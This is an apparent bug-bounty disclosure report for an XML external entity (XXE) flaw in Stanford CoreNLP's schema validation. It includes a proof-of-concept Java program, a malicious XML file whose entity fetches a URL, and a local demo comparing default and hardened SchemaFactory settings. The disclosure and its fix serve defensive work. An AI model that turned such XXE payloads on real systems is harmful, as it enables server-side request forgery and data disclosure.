Improper Restriction of XML External Entity Reference in stanfordnlp/corenlp
Valid
Reported on Jan 15th 2022
Description
When an attacker-controlled schema file is passed to getValidatingXmlParser(), the SchemaFactory that compiles it resolves any DOCTYPE and external entity declared in that file, so the schema-compilation step itself is vulnerable to XXE.

    public static DocumentBuilder getValidatingXmlParser(File schemaFile) {
        ...
        SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        Schema schema = factory.newSchema(schemaFile);

The SchemaFactory is created with default settings: FEATURE_SECURE_PROCESSING is never enabled, and the XMLConstants.ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA properties are left at their permissive defaults. As a result, newSchema(schemaFile) honours external entities in the schema file it is given. (On JDK 8 and later, explicitly enabling FEATURE_SECURE_PROCESSING on the built-in factory restricts both access properties to no access unless they are overridden; setting the two properties to the empty string directly has the same effect.)
Proof of Concept
With the JDK's default settings, SchemaFactory resolves external entities declared in the schema file it compiles, so running the program below against poc.xml makes the parser fetch http://127.0.0.1/ (observe it with a listener on that address):

    import javax.xml.validation.SchemaFactory;
    import javax.xml.validation.Schema;
    import javax.xml.XMLConstants;
    import java.io.File;

    public class Poc {
        public static void main(String[] args) {
            try {
                // Default factory: no FEATURE_SECURE_PROCESSING, no ACCESS_EXTERNAL_*
                // restriction, so the DOCTYPE in poc.xml is honoured and the external
                // entity is fetched while the schema file is being parsed.
                SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
                Schema schema = factory.newSchema(new File("poc.xml"));
            } catch (Exception e) {
                // poc.xml is not a valid XSD, so newSchema() throws afterwards;
                // the external entity has already been resolved by then.
                e.printStackTrace();
            }
        }
    }
poc.xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1/">]>
<foo>&xxe;</foo>
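To reproduce both the root cause in the Description and the PoC above without an external listener, here is an added example (not corenlp's code, and not part of the original report) that starts a local HTTP listener standing in for the attacker's host, writes a copy of poc.xml pointing at it, and compiles that file first with the default SchemaFactory and then with a hardened one. The class name XxeSchemaDemo, the helper names hardenedSchemaFactory() and hits(), the use of the JDK's built-in com.sun.net.httpserver, and the temp-file location are choices made for this example; it requires Java 11 or later.

```java
import com.sun.net.httpserver.HttpServer;
import java.io.File;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.concurrent.atomic.AtomicInteger;
import javax.xml.XMLConstants;
import javax.xml.validation.SchemaFactory;

public class XxeSchemaDemo {

    // Hardened variant (added example, not corenlp's code): enable secure processing
    // and explicitly forbid every protocol for external DTDs/entities and schemas
    // before newSchema() parses the attacker-controlled file.
    static SchemaFactory hardenedSchemaFactory() throws Exception {
        SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");    // "" = no access
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // "" = no access
        return factory;
    }

    // Compile schemaFile with the given factory and return how many requests
    // reached the listener while doing so. poc.xml is not a valid XSD, so
    // newSchema() throws in both cases; what differs is whether the external
    // entity was fetched before the failure.
    static int hits(SchemaFactory factory, File schemaFile, AtomicInteger counter) {
        counter.set(0);
        try {
            factory.newSchema(schemaFile);
        } catch (Exception e) {
            System.out.println("  newSchema: " + e.getClass().getSimpleName() + ": " + e.getMessage());
        }
        return counter.get();
    }

    public static void main(String[] args) throws Exception {
        // Local listener on an ephemeral port, standing in for the attacker's host.
        AtomicInteger requests = new AtomicInteger();
        HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0);
        server.createContext("/", ex -> {
            requests.incrementAndGet();
            ex.sendResponseHeaders(200, -1); // no body
            ex.close();
        });
        server.start();
        int port = server.getAddress().getPort();

        // Constructed malicious "schema": same shape as the report's poc.xml,
        // but pointing at the listener started above.
        Path poc = Files.createTempFile("poc", ".xml");
        Files.writeString(poc,
            "<?xml version=\"1.0\"?>\n" +
            "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1:" + port + "/\">]>\n" +
            "<foo>&xxe;</foo>\n", StandardCharsets.UTF_8);

        try {
            System.out.println("Default SchemaFactory:");
            int before = hits(SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI),
                              poc.toFile(), requests);
            System.out.println("  requests reaching listener: " + before);

            System.out.println("Hardened SchemaFactory:");
            int after = hits(hardenedSchemaFactory(), poc.toFile(), requests);
            System.out.println("  requests reaching listener: " + after);
        } finally {
            server.stop(0);
            Files.deleteIfExists(poc);
        }
    }
}
```

Run it with java XxeSchemaDemo.java. With the default factory the listener's counter increments while newSchema() is still parsing the file, before the call fails because the root element is not xs:schema; with the hardened factory the same call fails with an access-restriction error and the counter stays at zero. Setting ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA to the empty string is the configuration the OWASP XXE Prevention Cheat Sheet recommends for SchemaFactory; it is set explicitly here rather than relying on the default that FEATURE_SECURE_PROCESSING applies on the JDK's own parser.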
Patch
https://github.com/stanfordnlp/corenlp/compare/HEAD...haxatron:fix-xxe-2
Impact
Any developer who uses getValidatingXmlParser() to validate XML against a schema file an attacker can supply is exposed to XXE during schema compilation, even when the XML documents being validated are trusted: the PoC above shows the parser fetching an attacker-chosen URL before the schema is ever applied.
Activity
We are processing your report and will contact the stanfordnlp/corenlp team within 24 hours. (a year ago)
haxatron modified the report (four entries, each a year ago)
We have contacted a member of the stanfordnlp/corenlp team and are waiting to hear back. (a year ago)